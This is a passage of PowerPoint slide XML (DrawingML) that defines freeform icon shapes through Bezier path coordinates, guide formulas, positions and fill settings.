                  <a:gd name="T8" fmla="*/ 14 w 168"/>
                  <a:gd name="T9" fmla="*/ 57 h 164"/>
                  <a:gd name="T10" fmla="*/ 113 w 168"/>
                  <a:gd name="T11" fmla="*/ 6 h 164"/>
                  <a:gd name="T12" fmla="*/ 148 w 168"/>
                  <a:gd name="T13" fmla="*/ 18 h 164"/>
                  <a:gd name="T14" fmla="*/ 137 w 168"/>
                  <a:gd name="T15" fmla="*/ 53 h 164"/>
                  <a:gd name="T16" fmla="*/ 82 w 168"/>
                  <a:gd name="T17" fmla="*/ 80 h 164"/>
                  <a:gd name="T18" fmla="*/ 150 w 168"/>
                  <a:gd name="T19" fmla="*/ 115 h 164"/>
                  <a:gd name="T20" fmla="*/ 162 w 168"/>
                  <a:gd name="T21" fmla="*/ 150 h 164"/>
                  <a:gd name="T22" fmla="*/ 139 w 168"/>
                  <a:gd name="T2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164">
                    <a:moveTo>
                      <a:pt x="139" y="164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="164"/>
                      <a:pt x="131" y="163"/>
                      <a:pt x="127" y="161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5" y="99"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="0" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="70"/>
                      <a:pt x="5" y="62"/>
                      <a:pt x="14" y="57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26" y="0"/>
                      <a:pt x="141" y="5"/>
                      <a:pt x="148" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="31"/>
                      <a:pt x="149" y="46"/>
                      <a:pt x="137" y="53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150" y="115"/>
                      <a:pt x="150" y="115"/>
                      <a:pt x="150" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="121"/>
                      <a:pt x="168" y="137"/>
                      <a:pt x="162" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="159"/>
                      <a:pt x="148" y="164"/>
                      <a:pt x="13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1790" tIns="20895" rIns="41790" bIns="208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962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50" name="Freeform 785">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625FA805-6F47-8D41-AED4-2FCD914AC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155" y="5850059"/>
                <a:ext cx="68473" cy="29482"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 285"/>
                  <a:gd name="T1" fmla="*/ 123 h 123"/>
                  <a:gd name="T2" fmla="*/ 119 w 285"/>
                  <a:gd name="T3" fmla="*/ 119 h 123"/>
                  <a:gd name="T4" fmla="*/ 16 w 285"/>
                  <a:gd name="T5" fmla="*/ 59 h 123"/>
                  <a:gd name="T6" fmla="*/ 7 w 285"/>
                  <a:gd name="T7" fmla="*/ 23 h 123"/>
                  <a:gd name="T8" fmla="*/ 42 w 285"/>
                  <a:gd name="T9" fmla="*/ 14 h 123"/>
                  <a:gd name="T10" fmla="*/ 133 w 285"/>
                  <a:gd name="T11" fmla="*/ 67 h 123"/>
                  <a:gd name="T12" fmla="*/ 243 w 285"/>
                  <a:gd name="T13" fmla="*/ 7 h 123"/>
                  <a:gd name="T14" fmla="*/ 278 w 285"/>
                  <a:gd name="T15" fmla="*/ 17 h 123"/>
                  <a:gd name="T16" fmla="*/ 268 w 285"/>
                  <a:gd name="T17" fmla="*/ 52 h 123"/>
                  <a:gd name="T18" fmla="*/ 144 w 285"/>
                  <a:gd name="T19" fmla="*/ 120 h 123"/>
                  <a:gd name="T20" fmla="*/ 132 w 285"/>
                  <a:gd name="T21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5" h="123">
                    <a:moveTo>
                      <a:pt x="132" y="123"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="123"/>
                      <a:pt x="123" y="122"/>
                      <a:pt x="119" y="119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4" y="51"/>
                      <a:pt x="0" y="35"/>
                      <a:pt x="7" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="11"/>
                      <a:pt x="30" y="7"/>
                      <a:pt x="42" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="67"/>
                      <a:pt x="133" y="67"/>
                      <a:pt x="133" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243" y="7"/>
                      <a:pt x="243" y="7"/>
                      <a:pt x="243" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="0"/>
                      <a:pt x="271" y="5"/>
                      <a:pt x="278" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="285" y="30"/>
                      <a:pt x="280" y="46"/>
                      <a:pt x="268" y="52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1" y="122"/>
                      <a:pt x="136" y="123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1790" tIns="20895" rIns="41790" bIns="208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962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51" name="Freeform 786">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D32BBD-4E98-4447-A512-6F4670046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1506" y="5792047"/>
                <a:ext cx="32335" cy="55159"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 109 w 138"/>
                  <a:gd name="T1" fmla="*/ 231 h 231"/>
                  <a:gd name="T2" fmla="*/ 94 w 138"/>
                  <a:gd name="T3" fmla="*/ 227 h 231"/>
                  <a:gd name="T4" fmla="*/ 11 w 138"/>
                  <a:gd name="T5" fmla="*/ 170 h 231"/>
                  <a:gd name="T6" fmla="*/ 0 w 138"/>
                  <a:gd name="T7" fmla="*/ 148 h 231"/>
                  <a:gd name="T8" fmla="*/ 0 w 138"/>
                  <a:gd name="T9" fmla="*/ 26 h 231"/>
                  <a:gd name="T10" fmla="*/ 26 w 138"/>
                  <a:gd name="T11" fmla="*/ 0 h 231"/>
                  <a:gd name="T12" fmla="*/ 26 w 138"/>
                  <a:gd name="T13" fmla="*/ 0 h 231"/>
                  <a:gd name="T14" fmla="*/ 52 w 138"/>
                  <a:gd name="T15" fmla="*/ 26 h 231"/>
                  <a:gd name="T16" fmla="*/ 52 w 138"/>
                  <a:gd name="T17" fmla="*/ 135 h 231"/>
                  <a:gd name="T18" fmla="*/ 124 w 138"/>
                  <a:gd name="T19" fmla="*/ 184 h 231"/>
                  <a:gd name="T20" fmla="*/ 130 w 138"/>
                  <a:gd name="T21" fmla="*/ 220 h 231"/>
                  <a:gd name="T22" fmla="*/ 109 w 138"/>
                  <a:gd name="T23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231">
                    <a:moveTo>
                      <a:pt x="109" y="231"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="231"/>
                      <a:pt x="99" y="230"/>
                      <a:pt x="94" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="170"/>
                      <a:pt x="11" y="170"/>
                      <a:pt x="11" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="165"/>
                      <a:pt x="0" y="157"/>
                      <a:pt x="0" y="14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40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="135"/>
                      <a:pt x="52" y="135"/>
                      <a:pt x="52" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="184"/>
                      <a:pt x="124" y="184"/>
                      <a:pt x="124" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="192"/>
                      <a:pt x="138" y="208"/>
                      <a:pt x="130" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="227"/>
                      <a:pt x="117" y="231"/>
                      <a:pt x="10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1790" tIns="20895" rIns="41790" bIns="208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962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52" name="Freeform 787">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B744E7-2CD9-504D-B798-98DCB9E82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057" y="5757810"/>
                <a:ext cx="60865" cy="25678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 256"/>
                  <a:gd name="T1" fmla="*/ 111 h 111"/>
                  <a:gd name="T2" fmla="*/ 112 w 256"/>
                  <a:gd name="T3" fmla="*/ 108 h 111"/>
                  <a:gd name="T4" fmla="*/ 17 w 256"/>
                  <a:gd name="T5" fmla="*/ 60 h 111"/>
                  <a:gd name="T6" fmla="*/ 6 w 256"/>
                  <a:gd name="T7" fmla="*/ 25 h 111"/>
                  <a:gd name="T8" fmla="*/ 41 w 256"/>
                  <a:gd name="T9" fmla="*/ 14 h 111"/>
                  <a:gd name="T10" fmla="*/ 123 w 256"/>
                  <a:gd name="T11" fmla="*/ 56 h 111"/>
                  <a:gd name="T12" fmla="*/ 215 w 256"/>
                  <a:gd name="T13" fmla="*/ 7 h 111"/>
                  <a:gd name="T14" fmla="*/ 250 w 256"/>
                  <a:gd name="T15" fmla="*/ 17 h 111"/>
                  <a:gd name="T16" fmla="*/ 239 w 256"/>
                  <a:gd name="T17" fmla="*/ 52 h 111"/>
                  <a:gd name="T18" fmla="*/ 136 w 256"/>
                  <a:gd name="T19" fmla="*/ 108 h 111"/>
                  <a:gd name="T20" fmla="*/ 123 w 256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11">
                    <a:moveTo>
                      <a:pt x="123" y="111"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="111"/>
                      <a:pt x="115" y="110"/>
                      <a:pt x="112" y="108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5" y="53"/>
                      <a:pt x="0" y="38"/>
                      <a:pt x="6" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="28" y="7"/>
                      <a:pt x="41" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="56"/>
                      <a:pt x="123" y="56"/>
                      <a:pt x="123" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="7"/>
                      <a:pt x="215" y="7"/>
                      <a:pt x="215" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="0"/>
                      <a:pt x="243" y="5"/>
                      <a:pt x="250" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="30"/>
                      <a:pt x="252" y="46"/>
                      <a:pt x="239" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="108"/>
                      <a:pt x="136" y="108"/>
                      <a:pt x="136" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="110"/>
                      <a:pt x="128" y="111"/>
                      <a:pt x="123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1790" tIns="20895" rIns="41790" bIns="208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962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53" name="Freeform 789">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B48B455-FF71-F64C-A85D-C3486A053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832" y="5836745"/>
                <a:ext cx="12364" cy="39943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 166 h 166"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 140 h 166"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 25 h 166"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 166"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 25 h 166"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 140 h 166"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>
                  <a:gd name="T13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66">
                    <a:moveTo>
                      <a:pt x="26" y="166"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="166"/>
                      <a:pt x="0" y="154"/>
                      <a:pt x="0" y="14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40" y="0"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="52" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="140"/>
                      <a:pt x="52" y="140"/>
                      <a:pt x="52" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="154"/>
                      <a:pt x="40" y="166"/>
                      <a:pt x="26" y="1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1790" tIns="20895" rIns="41790" bIns="208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962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28D29E5-E84E-724C-B1BA-4416987EEC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3395199" y="1884054"/>
            <a:ext cx="337130" cy="385684"/>
            <a:chOff x="13690601" y="885826"/>
            <a:chExt cx="584200" cy="668338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FFA563-BB7B-9440-A48F-53139FBD7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4764" y="1119188"/>
              <a:ext cx="114300" cy="434975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 276"/>
                <a:gd name="T1" fmla="*/ 1048 h 1048"/>
                <a:gd name="T2" fmla="*/ 25 w 276"/>
                <a:gd name="T3" fmla="*/ 1048 h 1048"/>
                <a:gd name="T4" fmla="*/ 0 w 276"/>
                <a:gd name="T5" fmla="*/ 1023 h 1048"/>
                <a:gd name="T6" fmla="*/ 25 w 276"/>
                <a:gd name="T7" fmla="*/ 998 h 1048"/>
                <a:gd name="T8" fmla="*/ 170 w 276"/>
                <a:gd name="T9" fmla="*/ 998 h 1048"/>
                <a:gd name="T10" fmla="*/ 170 w 276"/>
                <a:gd name="T11" fmla="*/ 55 h 1048"/>
                <a:gd name="T12" fmla="*/ 183 w 276"/>
                <a:gd name="T13" fmla="*/ 32 h 1048"/>
                <a:gd name="T14" fmla="*/ 236 w 276"/>
                <a:gd name="T15" fmla="*/ 6 h 1048"/>
                <a:gd name="T16" fmla="*/ 269 w 276"/>
                <a:gd name="T17" fmla="*/ 17 h 1048"/>
                <a:gd name="T18" fmla="*/ 258 w 276"/>
                <a:gd name="T19" fmla="*/ 51 h 1048"/>
                <a:gd name="T20" fmla="*/ 220 w 276"/>
                <a:gd name="T21" fmla="*/ 70 h 1048"/>
                <a:gd name="T22" fmla="*/ 220 w 276"/>
                <a:gd name="T23" fmla="*/ 1023 h 1048"/>
                <a:gd name="T24" fmla="*/ 195 w 276"/>
                <a:gd name="T25" fmla="*/ 1048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6" h="1048">
                  <a:moveTo>
                    <a:pt x="195" y="1048"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="1048"/>
                    <a:pt x="25" y="1048"/>
                    <a:pt x="25" y="1048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1048"/>
                    <a:pt x="0" y="1037"/>
                    <a:pt x="0" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1009"/>
                    <a:pt x="11" y="998"/>
                    <a:pt x="25" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="998"/>
                    <a:pt x="170" y="998"/>
                    <a:pt x="170" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="55"/>
                    <a:pt x="170" y="55"/>
                    <a:pt x="170" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="45"/>
                    <a:pt x="175" y="37"/>
                    <a:pt x="183" y="32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48" y="0"/>
                    <a:pt x="263" y="5"/>
                    <a:pt x="269" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="30"/>
                    <a:pt x="271" y="45"/>
                    <a:pt x="258" y="51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220" y="1023"/>
                    <a:pt x="220" y="1023"/>
                    <a:pt x="220" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="1037"/>
                    <a:pt x="209" y="1048"/>
                    <a:pt x="195" y="10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56" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D407B17-FE0F-2941-B44F-110AD4BDD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77926" y="1119188"/>
              <a:ext cx="117475" cy="434975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 257 w 282"/>
                <a:gd name="T1" fmla="*/ 1048 h 1048"/>
                <a:gd name="T2" fmla="*/ 88 w 282"/>
                <a:gd name="T3" fmla="*/ 1048 h 1048"/>
                <a:gd name="T4" fmla="*/ 63 w 282"/>
                <a:gd name="T5" fmla="*/ 1023 h 1048"/>
                <a:gd name="T6" fmla="*/ 63 w 282"/>
                <a:gd name="T7" fmla="*/ 71 h 1048"/>
                <a:gd name="T8" fmla="*/ 18 w 282"/>
                <a:gd name="T9" fmla="*/ 51 h 1048"/>
                <a:gd name="T10" fmla="*/ 5 w 282"/>
                <a:gd name="T11" fmla="*/ 18 h 1048"/>
                <a:gd name="T12" fmla="*/ 38 w 282"/>
                <a:gd name="T13" fmla="*/ 6 h 1048"/>
                <a:gd name="T14" fmla="*/ 98 w 282"/>
                <a:gd name="T15" fmla="*/ 32 h 1048"/>
                <a:gd name="T16" fmla="*/ 113 w 282"/>
                <a:gd name="T17" fmla="*/ 55 h 1048"/>
                <a:gd name="T18" fmla="*/ 113 w 282"/>
                <a:gd name="T19" fmla="*/ 998 h 1048"/>
                <a:gd name="T20" fmla="*/ 232 w 282"/>
                <a:gd name="T21" fmla="*/ 998 h 1048"/>
                <a:gd name="T22" fmla="*/ 232 w 282"/>
                <a:gd name="T23" fmla="*/ 516 h 1048"/>
                <a:gd name="T24" fmla="*/ 257 w 282"/>
                <a:gd name="T25" fmla="*/ 491 h 1048"/>
                <a:gd name="T26" fmla="*/ 282 w 282"/>
                <a:gd name="T27" fmla="*/ 516 h 1048"/>
                <a:gd name="T28" fmla="*/ 282 w 282"/>
                <a:gd name="T29" fmla="*/ 1023 h 1048"/>
                <a:gd name="T30" fmla="*/ 257 w 282"/>
                <a:gd name="T31" fmla="*/ 1048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1048">
                  <a:moveTo>
                    <a:pt x="257" y="1048"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="1048"/>
                    <a:pt x="88" y="1048"/>
                    <a:pt x="88" y="1048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="1048"/>
                    <a:pt x="63" y="1037"/>
                    <a:pt x="63" y="1023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5" y="46"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="5" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="6"/>
                    <a:pt x="26" y="0"/>
                    <a:pt x="38" y="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107" y="36"/>
                    <a:pt x="113" y="45"/>
                    <a:pt x="113" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="998"/>
                    <a:pt x="113" y="998"/>
                    <a:pt x="113" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="998"/>
                    <a:pt x="232" y="998"/>
                    <a:pt x="232" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="516"/>
                    <a:pt x="232" y="516"/>
                    <a:pt x="232" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="502"/>
                    <a:pt x="243" y="491"/>
                    <a:pt x="257" y="491"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="491"/>
                    <a:pt x="282" y="502"/>
                    <a:pt x="282" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1023"/>
                    <a:pt x="282" y="1023"/>
                    <a:pt x="282" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1037"/>
                    <a:pt x="271" y="1048"/>
                    <a:pt x="257" y="10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57" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ECD98CE-2D0B-DD42-9ADC-FFF464D27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0789" y="885826"/>
              <a:ext cx="131763" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 158 w 315"/>
                <a:gd name="T1" fmla="*/ 352 h 352"/>
                <a:gd name="T2" fmla="*/ 0 w 315"/>
                <a:gd name="T3" fmla="*/ 195 h 352"/>
                <a:gd name="T4" fmla="*/ 0 w 315"/>
                <a:gd name="T5" fmla="*/ 157 h 352"/>
                <a:gd name="T6" fmla="*/ 24 w 315"/>
                <a:gd name="T7" fmla="*/ 75 h 352"/>
                <a:gd name="T8" fmla="*/ 58 w 315"/>
                <a:gd name="T9" fmla="*/ 67 h 352"/>
                <a:gd name="T10" fmla="*/ 66 w 315"/>
                <a:gd name="T11" fmla="*/ 101 h 352"/>
                <a:gd name="T12" fmla="*/ 50 w 315"/>
                <a:gd name="T13" fmla="*/ 157 h 352"/>
                <a:gd name="T14" fmla="*/ 50 w 315"/>
                <a:gd name="T15" fmla="*/ 195 h 352"/>
                <a:gd name="T16" fmla="*/ 158 w 315"/>
                <a:gd name="T17" fmla="*/ 302 h 352"/>
                <a:gd name="T18" fmla="*/ 265 w 315"/>
                <a:gd name="T19" fmla="*/ 195 h 352"/>
                <a:gd name="T20" fmla="*/ 265 w 315"/>
                <a:gd name="T21" fmla="*/ 157 h 352"/>
                <a:gd name="T22" fmla="*/ 158 w 315"/>
                <a:gd name="T23" fmla="*/ 50 h 352"/>
                <a:gd name="T24" fmla="*/ 108 w 315"/>
                <a:gd name="T25" fmla="*/ 62 h 352"/>
                <a:gd name="T26" fmla="*/ 74 w 315"/>
                <a:gd name="T27" fmla="*/ 52 h 352"/>
                <a:gd name="T28" fmla="*/ 85 w 315"/>
                <a:gd name="T29" fmla="*/ 18 h 352"/>
                <a:gd name="T30" fmla="*/ 158 w 315"/>
                <a:gd name="T31" fmla="*/ 0 h 352"/>
                <a:gd name="T32" fmla="*/ 315 w 315"/>
                <a:gd name="T33" fmla="*/ 157 h 352"/>
                <a:gd name="T34" fmla="*/ 315 w 315"/>
                <a:gd name="T35" fmla="*/ 195 h 352"/>
                <a:gd name="T36" fmla="*/ 158 w 315"/>
                <a:gd name="T37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5" h="352">
                  <a:moveTo>
                    <a:pt x="158" y="352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="352"/>
                    <a:pt x="0" y="282"/>
                    <a:pt x="0" y="19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28"/>
                    <a:pt x="8" y="100"/>
                    <a:pt x="24" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="63"/>
                    <a:pt x="46" y="59"/>
                    <a:pt x="58" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="74"/>
                    <a:pt x="74" y="89"/>
                    <a:pt x="66" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="118"/>
                    <a:pt x="50" y="137"/>
                    <a:pt x="50" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="195"/>
                    <a:pt x="50" y="195"/>
                    <a:pt x="50" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="254"/>
                    <a:pt x="99" y="302"/>
                    <a:pt x="158" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="302"/>
                    <a:pt x="265" y="254"/>
                    <a:pt x="265" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="157"/>
                    <a:pt x="265" y="157"/>
                    <a:pt x="265" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="98"/>
                    <a:pt x="217" y="50"/>
                    <a:pt x="158" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="124" y="54"/>
                    <a:pt x="108" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="69"/>
                    <a:pt x="81" y="64"/>
                    <a:pt x="74" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="39"/>
                    <a:pt x="73" y="24"/>
                    <a:pt x="85" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="6"/>
                    <a:pt x="132" y="0"/>
                    <a:pt x="158" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="315" y="71"/>
                    <a:pt x="315" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="195"/>
                    <a:pt x="315" y="195"/>
                    <a:pt x="315" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="282"/>
                    <a:pt x="245" y="352"/>
                    <a:pt x="158" y="3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58" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194259DA-450D-2842-939C-329999D3A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5851" y="1195388"/>
              <a:ext cx="114300" cy="358775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 276"/>
                <a:gd name="T1" fmla="*/ 861 h 861"/>
                <a:gd name="T2" fmla="*/ 25 w 276"/>
                <a:gd name="T3" fmla="*/ 861 h 861"/>
                <a:gd name="T4" fmla="*/ 0 w 276"/>
                <a:gd name="T5" fmla="*/ 836 h 861"/>
                <a:gd name="T6" fmla="*/ 25 w 276"/>
                <a:gd name="T7" fmla="*/ 811 h 861"/>
                <a:gd name="T8" fmla="*/ 155 w 276"/>
                <a:gd name="T9" fmla="*/ 811 h 861"/>
                <a:gd name="T10" fmla="*/ 155 w 276"/>
                <a:gd name="T11" fmla="*/ 25 h 861"/>
                <a:gd name="T12" fmla="*/ 180 w 276"/>
                <a:gd name="T13" fmla="*/ 0 h 861"/>
                <a:gd name="T14" fmla="*/ 251 w 276"/>
                <a:gd name="T15" fmla="*/ 0 h 861"/>
                <a:gd name="T16" fmla="*/ 276 w 276"/>
                <a:gd name="T17" fmla="*/ 25 h 861"/>
                <a:gd name="T18" fmla="*/ 251 w 276"/>
                <a:gd name="T19" fmla="*/ 50 h 861"/>
                <a:gd name="T20" fmla="*/ 205 w 276"/>
                <a:gd name="T21" fmla="*/ 50 h 861"/>
                <a:gd name="T22" fmla="*/ 205 w 276"/>
                <a:gd name="T23" fmla="*/ 836 h 861"/>
                <a:gd name="T24" fmla="*/ 180 w 276"/>
                <a:gd name="T25" fmla="*/ 861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6" h="861">
                  <a:moveTo>
                    <a:pt x="180" y="861"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="861"/>
                    <a:pt x="25" y="861"/>
                    <a:pt x="25" y="861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="861"/>
                    <a:pt x="0" y="850"/>
                    <a:pt x="0" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="822"/>
                    <a:pt x="11" y="811"/>
                    <a:pt x="25" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="811"/>
                    <a:pt x="155" y="811"/>
                    <a:pt x="155" y="811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11"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="180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65" y="0"/>
                    <a:pt x="276" y="11"/>
                    <a:pt x="276" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="39"/>
                    <a:pt x="265" y="50"/>
                    <a:pt x="251" y="50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5" y="836"/>
                    <a:pt x="205" y="836"/>
                    <a:pt x="205" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="850"/>
                    <a:pt x="194" y="861"/>
                    <a:pt x="180" y="8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59" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF9AEE1-6A72-A641-8F14-151359356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0764" y="1247776"/>
              <a:ext cx="85725" cy="306388"/>
            </a:xfrm>
